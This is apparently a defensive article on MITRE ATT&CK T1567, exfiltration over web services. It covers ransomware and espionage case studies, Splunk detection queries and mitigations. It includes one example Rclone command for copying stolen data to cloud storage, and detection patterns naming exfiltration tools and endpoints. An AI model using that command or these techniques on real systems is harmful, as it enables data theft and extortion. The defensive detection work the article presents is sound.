T1567: Exfiltration Over Web Service

T1567 falls under the Exfiltration tactic (TA0010). Unlike techniques that use the adversary's own C2 infrastructure for data theft, T1567 leverages legitimate, trusted third-party web services. This creates several distinct advantages for attackers: the destination domains (google.com, mega.nz, dropbox.com, github.com, discord.com) are whitelisted by corporate firewalls, the traffic uses standard HTTPS encryption that prevents deep packet inspection, the cloud service infrastructure handles bandwidth and availability, and the exfiltration metadata (DNS queries, TLS certificates, connection patterns) is indistinguishable from normal business activity.

The technique spans every major platform — Windows, Linux, macOS, ESXi, SaaS, and Office Suite environments. Its adoption has accelerated dramatically since 2019 when the Maze ransomware group pioneered the double-extortion model by publishing stolen data from victims who refused to pay. Within months, nearly every major ransomware operation adopted the approach, and T1567 became the standard mechanism for the data theft half of the equation.

The Four Sub-Techniques

T1567.001 — Exfiltration to Code Repository

Adversaries exfiltrate data to code repositories like GitHub, GitLab, or Bitbucket, leveraging their HTTPS-based APIs for encrypted data transfer. Code repositories provide natural cover in environments where developers regularly push code, and the API-based access pattern is difficult to distinguish from legitimate development activity. PowerShell Empire has documented exfiltration capabilities targeting GitHub repositories. This sub-technique is particularly effective against technology companies where Git traffic is ubiquitous.

T1567.002 — Exfiltration to Cloud Storage

This is the dominant sub-technique, accounting for the majority of T1567 activity observed in the wild. Adversaries upload stolen data to cloud storage services including Mega.nz, Google Drive, Dropbox, OneDrive, Amazon S3, and other file hosting platforms. The two primary tools observed are Rclone (an open-source, cross-platform file synchronization utility that supports over 40 cloud storage providers) and MegaSync/MegaCmd (native Mega.nz client tools). Red Canary has observed Mega used as an exfiltration destination in multiple incident response engagements, with adversaries leveraging the free file transfer utilities that Mega provides to its customers.

The Rclone and Mega combination is favored by ransomware operators because Mega offers significant free storage, operates from a jurisdiction with strong privacy protections (New Zealand), and is uncommon in enterprise environments — meaning its presence is itself an indicator of compromise in many organizations. Storm-0501, the ransomware affiliate group, uses renamed Rclone binaries (masquerading as svhost.exe or scvhost.exe) to synchronize stolen data to MegaSync across multiple threads.

T1567.003 — Exfiltration to Text Storage Sites

Adversaries exfiltrate data to text storage sites like Pastebin, Ghostbin, or similar paste services. These services are commonly used by developers to share code and text snippets, providing cover for adversarial data uploads. While paste sites typically have size limits that make them unsuitable for large-scale data theft, they are effective for exfiltrating credentials, configuration files, reconnaissance results, and other text-based intelligence. Infostealers commonly use paste sites to exfiltrate harvested credentials, and C2 frameworks use them to store configuration data or receive commands.

T1567.004 — Exfiltration Over Webhook

The newest sub-technique (added July 2023), reflecting the growing abuse of webhook endpoints for data exfiltration. Adversaries send stolen data to webhook URLs provided by services like Discord, Slack, Microsoft Teams, and custom webhook endpoints. Discord webhooks have become particularly prevalent in commodity malware and infostealers — the CyberArk Labs report documented extensive abuse of Discord's webhook infrastructure for sending stolen credentials and system information from compromised hosts. Webhook exfiltration is difficult to detect because the traffic uses standard HTTPS to well-known SaaS platforms, and webhook endpoints can be created anonymously.

How Web Service Exfiltration Works

The exfiltration workflow typically follows a three-stage pattern: data staging, tool deployment, and data transfer.

Data staging. Before exfiltration, adversaries identify and collect target data (T1005, T1039), then compress and often encrypt it using tools like WinRAR, 7-Zip, or tar (T1560). This reduces transfer volume and makes the exfiltrated data harder to inspect even if intercepted. Ransomware operators like BlackByte have developed dedicated exfiltration tools — the Exbyte tool (documented by Symantec) enumerates all document files on an infected machine, creates a summary including filename and directory location, then uploads the collection to cloud hosting services.

Tool deployment. Adversaries deploy file transfer utilities, either bringing their own tools (Rclone, MegaCmd, cloud provider CLI tools) or leveraging tools already present on the system. In living-off-the-land approaches, adversaries may use PowerShell's Invoke-WebRequest or curl to interact with cloud APIs directly. Storm-0501 renames Rclone binaries to resemble legitimate Windows processes (svhost.exe, scvhost.exe) as a masquerading technique (T1036) to avoid detection.

Data transfer. The actual exfiltration typically occurs over HTTPS to the cloud service, using the service's API or native client protocol. Rclone can be configured with a dedicated configuration file that specifies the cloud storage destination, authentication credentials, and transfer parameters including multi-threading. A typical Rclone command for exfiltration looks like: rclone copy --config config.conf /path/to/data remote:bucket --transfers 11 --multi-thread-streams 11. The multi-threading capability allows adversaries to saturate the network connection and complete exfiltration quickly.

Why Web Service Exfiltration Matters

Double extortion is now the dominant ransomware model. Backups alone no longer protect organizations. Even if an organization can fully restore encrypted systems from immutable backups, the adversary still holds stolen data as leverage. The threat of publishing sensitive data on leak sites, selling it to competitors, or reporting regulatory violations creates pressure to pay regardless of recovery capability. This has fundamentally changed the economics of ransomware defense.

The exfiltration window is shrinking. The Unit 42 2026 Global Incident Response Report found that the fastest 25% of attackers now reach the exfiltration phase within 72 minutes of initial access. Splunk and Sophos analysis places median dwell time before encryption at four to five days, but the exfiltration often happens days before the ransomware payload is deployed, giving adversaries ample time to transfer terabytes of data before anyone knows a compromise has occurred.

Detection is architecturally difficult. Traditional security controls are designed to block known-bad destinations. T1567 routes data to known-good destinations — the same cloud services the organization uses for legitimate business. Blocking Mega, Dropbox, or Google Drive may be viable for individual services but creates operational disruption. And because the traffic is encrypted end-to-end, even organizations with TLS inspection capabilities may not inspect traffic to trusted SaaS domains.

Cloud-to-cloud exfiltration bypasses perimeter controls entirely. Storm-0501's 2025 evolution demonstrates a new threat: cloud-based ransomware where the attacker compromises Azure Storage accounts, exposes them to the internet, and exfiltrates data directly from cloud to attacker infrastructure using Azure's own AzCopy tool. This bypasses on-premises network monitoring entirely because the data never traverses the corporate network.

Real-World Case Studies

Storm-0501 — Hybrid Cloud Ransomware with Rclone and Mega Exfiltration (2024-2025)

Storm-0501, a financially motivated ransomware affiliate group active since 2021, has deployed Rclone renamed as svhost.exe or scvhost.exe to exfiltrate data to MegaSync cloud storage. Microsoft's Threat Intelligence team documented the group using multi-threaded Rclone transfers with dedicated configuration files synchronizing stolen data across 11 parallel streams. In their 2025 evolution, Storm-0501 shifted to cloud-based ransomware tactics: after compromising Azure environments through stolen Entra ID credentials, they exfiltrated data directly from Azure Storage accounts using Microsoft's own AzCopy utility, then destroyed backups and demanded ransom via compromised Microsoft Teams accounts. This represents the convergence of T1567 with cloud-native attack techniques that bypass traditional perimeter monitoring.

Scattered Spider — Data Theft for Extortion Across Industries (2023-2025)

Scattered Spider (also tracked as Octo Tempest), a cybercriminal group that targets large companies and their IT help desks, engages in data theft for extortion as a core business model. According to a July 2025 joint advisory from CISA, FBI, and international partners, Scattered Spider uses multiple ransomware variants (most recently DragonForce) alongside data exfiltration to cloud services. The group leverages living-off-the-land techniques and legitimate remote access tools to identify, stage, and exfiltrate sensitive data to cloud storage before deploying ransomware. Their ability to rapidly compromise identities through sophisticated social engineering — including SIM swapping, MFA fatigue, and help desk impersonation — gives them the access needed to locate and exfiltrate high-value data within hours of initial access.

Medusa Ransomware — Exfiltration to Cloud Storage in Double-Extortion Campaigns (2025)

The Medusa ransomware group, which impacted over 300 organizations across critical infrastructure sectors by early 2025, uses systematic data exfiltration to cloud storage as part of its double-extortion model. The March 2025 joint advisory from CISA, FBI, and MS-ISAC documented Medusa's use of Rclone and other tools to transfer stolen data to attacker-controlled cloud storage before deploying encryption. Medusa's operators search for files associated with remote management services, financial records, and intellectual property, then exfiltrate this data to provide leverage during ransom negotiations. Victims who refuse to pay face publication on Medusa's dedicated leak site.

BlackByte / Exbyte — Purpose-Built Exfiltration Tool (2022-2025)

BlackByte ransomware operators developed Exbyte, a dedicated exfiltration tool written in Go, specifically for automating data theft to cloud storage. Documented by Symantec in 2022 and observed in Microsoft incident response engagements through 2025, Exbyte enumerates all document files on an infected machine, creates a summary including filename and directory location, then uploads the entire collection to an adversary-controlled cloud hosting account. The creation of a purpose-built exfiltration tool — rather than relying on generic utilities like Rclone — demonstrates how ransomware operations are investing in specialized tooling for each phase of the attack, treating data exfiltration as important as the encryption itself.

APT29 (NOBELIUM) — Cloud Service Abuse for Espionage Exfiltration

APT29, attributed to Russia's SVR, has been documented using multiple web services for data exfiltration across its espionage campaigns. The BoomBox malware, part of NOBELIUM's early-stage toolset, searched for specific files and directories on compromised machines, then exfiltrated collected data to cloud storage services. Turla, another Russian espionage group, used Crutch malware to exfiltrate data through Dropbox, leveraging the legitimate cloud storage service as both a C2 channel and an exfiltration destination. OilRig (APT34), the Iranian threat group, used cloud service-powered downloaders that also served as exfiltration channels, blending data theft with command-and-control traffic through the same cloud infrastructure.

Contagious Interview / Lazarus Group — Telegram-Based Exfiltration

North Korean threat actors operating the Contagious Interview campaign have used Telegram Bot API endpoints with pre-configured bot tokens to exfiltrate stolen data. The InvisibleFerret malware sends harvested files, credentials, and system information as messages or file attachments to adversary-controlled Telegram channels. Magic Hound (APT42), the Iranian threat group, uses similar Telegram-based exfiltration, exploiting the messaging platform's encrypted channels and the difficulty of distinguishing malicious bot API calls from legitimate Telegram usage.

Detection Strategies

Detecting T1567 requires a shift from traditional signature-based approaches to behavioral and volumetric analysis. The challenge is that the destination services are legitimate and the traffic is encrypted, so defenders must focus on detecting the tools, the transfer patterns, and the anomalous data flows rather than the content itself.

Key Monitoring Points

Data Source	What to Monitor	Detection Logic
Sysmon Event ID 1 (Process Creation)	Rclone, MegaCmd, MegaSync execution	Flag execution of rclone.exe, megacmd.exe, megasync.exe, or any process with Rclone/Mega in its original filename or description metadata. Also flag renamed binaries with Rclone command-line patterns (copy, sync, --config, --transfers)
Sysmon Event ID 11 (File Created)	Rclone configuration files	Alert on creation of .conf or .config files containing cloud storage configuration keywords (mega, remote, s3, drive, dropbox) in temporary or unusual directories
Network Traffic (DNS/NetFlow)	Connections to uncommon cloud storage	Monitor for DNS queries and connections to mega.nz, mega.co.nz, *.userstorage.mega.co.nz from any host. Mega is rarely used legitimately in enterprise environments, making any connection suspicious
Network Traffic (Volumetric)	Anomalous outbound data volume	Baseline normal outbound data volumes per host and per user, then alert on significant deviations. A workstation that typically sends 100MB/day suddenly uploading 50GB warrants investigation regardless of the destination
Cloud Access Security Broker (CASB)	Uploads to unsanctioned cloud services	Deploy a CASB to monitor and control access to cloud storage services. Flag uploads to personal or unsanctioned cloud accounts, especially from sensitive systems or during off-hours
Sysmon Event ID 3 (Network Connection)	Discord/Telegram webhook connections from non-browser processes	Flag connections to discord.com/api/webhooks or api.telegram.org/bot from non-browser processes. Legitimate webhook usage from business applications should be baselined and whitelisted
Endpoint / EDR	Large archive file creation before upload	Correlate creation of large archive files (.zip, .rar, .7z, .tar.gz) with subsequent network connections to cloud storage services. Data staging followed by exfiltration is a strong signal

Splunk Detection Queries

Query 1: Rclone Execution Detection

Detects execution of Rclone or renamed Rclone binaries based on process name, original filename, and command-line patterns. This is the single highest-value detection for T1567 given Rclone's 57% prevalence in ransomware exfiltration.

index=windows source="XmlWinEventLog:Microsoft-Windows-Sysmon/Operational" EventCode=1
((process_name=rclone.exe OR OriginalFileName=rclone.exe)
  OR (CommandLine="*--config*" AND CommandLine="*copy*" AND
    (CommandLine="*mega*" OR CommandLine="*remote:*" OR CommandLine="*--transfers*")))
| table _time host user process_name process_path CommandLine parent_process_name OriginalFileName
| sort -_time

Query 2: Mega.nz Network Connections

Detects network connections to Mega cloud storage infrastructure. Because Mega is rarely used legitimately in enterprise environments, any connection to Mega domains warrants investigation.

index=dns OR index=proxy OR index=firewall
(query="*mega.nz*" OR query="*mega.co.nz*" OR dest_host="*mega.nz*"
  OR dest_host="*userstorage.mega.co.nz*" OR url="*mega.nz*")
| stats count values(src_ip) as sources values(query) as domains by host
| where count > 5
| sort -count

Query 3: Discord/Telegram Webhook Abuse

Detects non-browser processes communicating with Discord webhook or Telegram Bot API endpoints, which may indicate infostealer or malware exfiltration via webhook.

index=windows source="XmlWinEventLog:Microsoft-Windows-Sysmon/Operational" EventCode=3
(DestinationHostname="*discord.com*" OR DestinationHostname="*api.telegram.org*")
NOT (Image="*\\chrome.exe" OR Image="*\\firefox.exe" OR Image="*\\msedge.exe"
  OR Image="*\\brave.exe" OR Image="*\\Teams.exe" OR Image="*\\slack.exe")
| table _time host user Image DestinationHostname DestinationPort
| sort -_time

Query 4: Anomalous Outbound Data Volume

Detects hosts sending significantly more data than their historical baseline, a pattern consistent with bulk data exfiltration to cloud services.

index=firewall OR index=proxy
| bin _time span=1h
| stats sum(bytes_out) as hourly_bytes_out by src_ip _time
| eventstats avg(hourly_bytes_out) as avg_out stdev(hourly_bytes_out) as stdev_out by src_ip
| where hourly_bytes_out > (avg_out + (3 * stdev_out)) AND hourly_bytes_out > 1073741824
| eval GB_sent=round(hourly_bytes_out/1073741824,2)
| table _time src_ip GB_sent avg_out hourly_bytes_out
| sort -GB_sent

Known Threat Actors and Malware

Ransomware and Double-Extortion Groups

Actor / Malware	T1567 Usage
Storm-0501	Rclone renamed as svhost.exe/scvhost.exe exfiltrating to MegaSync; AzCopy for cloud-to-cloud exfiltration from Azure Storage (2024-2025)
Scattered Spider	Data exfiltration to cloud storage as core extortion business model; deploys DragonForce ransomware alongside data theft (2025 CISA advisory)
Medusa	Rclone-based exfiltration to cloud storage before double-extortion encryption; 300+ victims by early 2025
BlackByte / Exbyte	Purpose-built Go-based exfiltration tool that enumerates documents and uploads to cloud hosting
Conti / Bazar	Rclone exfiltration to cloud storage documented in DFIR Report and leaked operator playbooks
Sabbath (54bb47h)	Early Storm-0501 operations using cloud exfiltration targeting US school districts
Embargo	Double-extortion model with cloud-based data exfiltration through Storm-0501 affiliate operations

State-Sponsored Espionage

Actor / Malware	Attribution	T1567 Usage
APT29 / BoomBox	Russia (SVR)	NOBELIUM's early-stage toolset exfiltrating to cloud storage; Dropbox and other services for data staging
APT28 (Pawn Storm)	Russia (GRU)	Web service-based exfiltration as part of phishing and credential theft campaigns
Turla / Crutch	Russia (FSB)	Dropbox-based exfiltration blending data theft with C2 communications
OilRig (APT34)	Iran	Cloud service-powered downloaders serving as exfiltration channels (2023-2024)
Magic Hound (APT42)	Iran	Telegram Bot API endpoints for exfiltration of stolen data from compromised systems
Contagious Interview / Lazarus	North Korea	Telegram-based exfiltration via InvisibleFerret; cloud storage exfiltration in Operation DEEP#DRIVE
APT41 / DUSTTRAP	China	Cloud storage exfiltration documented in 2024 "Arisen From the DUST" analysis
POLONIUM	Lebanon (Iran-linked)	Exfiltration to cloud services targeting Israeli organizations

Tools and Utilities

Tool	T1567 Usage
Rclone	Open-source file sync utility supporting 40+ cloud providers; found in 57% of ransomware exfiltration incidents (Symantec/Broadcom)
MegaSync / MegaCmd	Native Mega.nz client tools for file upload; favored for free storage and privacy protections
Exbyte	BlackByte's Go-based custom exfiltration tool for automated document collection and cloud upload
AzCopy	Microsoft Azure CLI tool abused by Storm-0501 for cloud-to-cloud exfiltration from Azure Storage accounts
ngrok	Tunnel service used to create encrypted exfiltration channels; observed in credit card skimming and data theft

Defensive Recommendations

1. Block or monitor uncommon cloud storage services

If your organization does not use Mega.nz for business purposes, block network access to mega.nz, mega.co.nz, and *.userstorage.mega.co.nz at the firewall or proxy level. This eliminates the single most common exfiltration destination used by ransomware operators. Apply the same logic to other cloud storage services not sanctioned for business use. Where blocking is not feasible, configure high-priority alerts for any connection to these domains.

2. Detect and block Rclone execution

Rclone is rarely used legitimately in enterprise environments. Deploy application control rules (AppLocker, WDAC) that block execution of Rclone binaries. Because adversaries rename Rclone to evade name-based detection, also monitor for binaries that match Rclone's original filename metadata, PE header properties, or command-line argument patterns (--config, --transfers, copy, sync, remote:). The combination of process metadata and command-line analysis catches renamed instances.

3. Implement outbound data volume monitoring

Baseline normal outbound data volumes per host, per user, and per destination. Alert when any host or user exceeds three standard deviations above their historical average, especially for connections to cloud storage services. A workstation that typically sends 200MB per day suddenly transferring 50GB to any cloud service — even a sanctioned one — should trigger immediate investigation. This volumetric approach detects exfiltration regardless of the specific tool or destination used.

4. Deploy a Cloud Access Security Broker (CASB)

A CASB provides visibility and control over cloud service usage, including the ability to distinguish between sanctioned corporate cloud accounts and personal or adversary-controlled accounts. Configure the CASB to block uploads to unsanctioned cloud tenants, monitor for anomalous upload volumes, and flag data transfers to new or unfamiliar cloud accounts. This is particularly important for detecting exfiltration to Google Drive or OneDrive accounts that are not part of the corporate tenant.

5. Monitor for data staging activity

Exfiltration is almost always preceded by data staging — the creation of compressed archive files containing the data to be stolen. Monitor for creation of large .zip, .rar, .7z, or .tar.gz files in temporary directories, user profile paths, or network share root directories. Correlate archive creation with subsequent network connections to cloud storage services. The staging-then-exfiltration pattern is a high-confidence detection signal.

6. Implement TLS inspection for cloud storage traffic

Where operationally and legally feasible, deploy TLS inspection (SSL/TLS decryption) for traffic to cloud storage services. This enables deep packet inspection that can detect data exfiltration based on the content being transferred. Be aware of privacy, legal, and operational implications — TLS inspection for banking sites and healthcare portals may violate regulations, and improperly configured inspection can break certificate pinning for legitimate applications.

7. Restrict webhook creation and monitor webhook traffic

In Discord, Slack, and Teams environments, restrict which users and integrations can create webhooks. Monitor for webhook traffic originating from non-browser processes, especially connections to discord.com/api/webhooks or api.telegram.org/bot from unsigned binaries or processes in user-writable directories. Webhook-based exfiltration is a growing vector for infostealers and commodity malware.

8. Secure Azure and cloud storage accounts against direct exfiltration

Storm-0501's 2025 cloud-based ransomware tactics demonstrate that adversaries can exfiltrate data directly from cloud storage accounts without routing traffic through the corporate network. Enable auditing on Azure Storage accounts, restrict public access settings, monitor for AzCopy usage by non-administrative accounts, and implement conditional access policies that limit storage account access to known management endpoints. Cloud-to-cloud exfiltration bypasses all on-premises detection capabilities.

MITRE ATT&CK Mapping

Field	Value
Technique ID	T1567
Technique Name	Exfiltration Over Web Service
Tactics	Exfiltration (TA0010)
Platforms	Windows, Linux, macOS, ESXi, SaaS, Office Suite
Sub-Techniques	T1567.001 Exfiltration to Code Repository, T1567.002 Exfiltration to Cloud Storage, T1567.003 Exfiltration to Text Storage Sites, T1567.004 Exfiltration Over Webhook
Data Sources	Network Traffic (Flow, Content), File (Access), Command (Execution), Application Log (Content)
Mitigations	Restrict Web-Based Content (M1021)
Version	1.5 (last modified October 2025)
MITRE Reference	attack.mitre.org/techniques/T1567

Sources and References

• MITRE ATT&CK — T1567 Exfiltration Over Web Service: attack.mitre.org
• Microsoft — Storm-0501: Ransomware Attacks Expanding to Hybrid Cloud Environments: microsoft.com
• Microsoft — Storm-0501's Evolving Techniques Lead to Cloud-Based Ransomware (2025): microsoft.com
• CISA, FBI — Scattered Spider Advisory (Updated July 2025): cisa.gov
• CISA, FBI, MS-ISAC — #StopRansomware: Medusa Ransomware (AA25-071A): cisa.gov
• Red Canary — Rclone Wars: Transferring Leverage in a Ransomware Attack: redcanary.com
• Symantec — Exbyte: BlackByte Ransomware Attackers Deploy New Exfiltration Tool: security.com
• Vectra AI — Double Extortion Ransomware: Detect It Before Data Is Lost (2025): vectra.ai
• Picus Security — Red Report 2026: picussecurity.com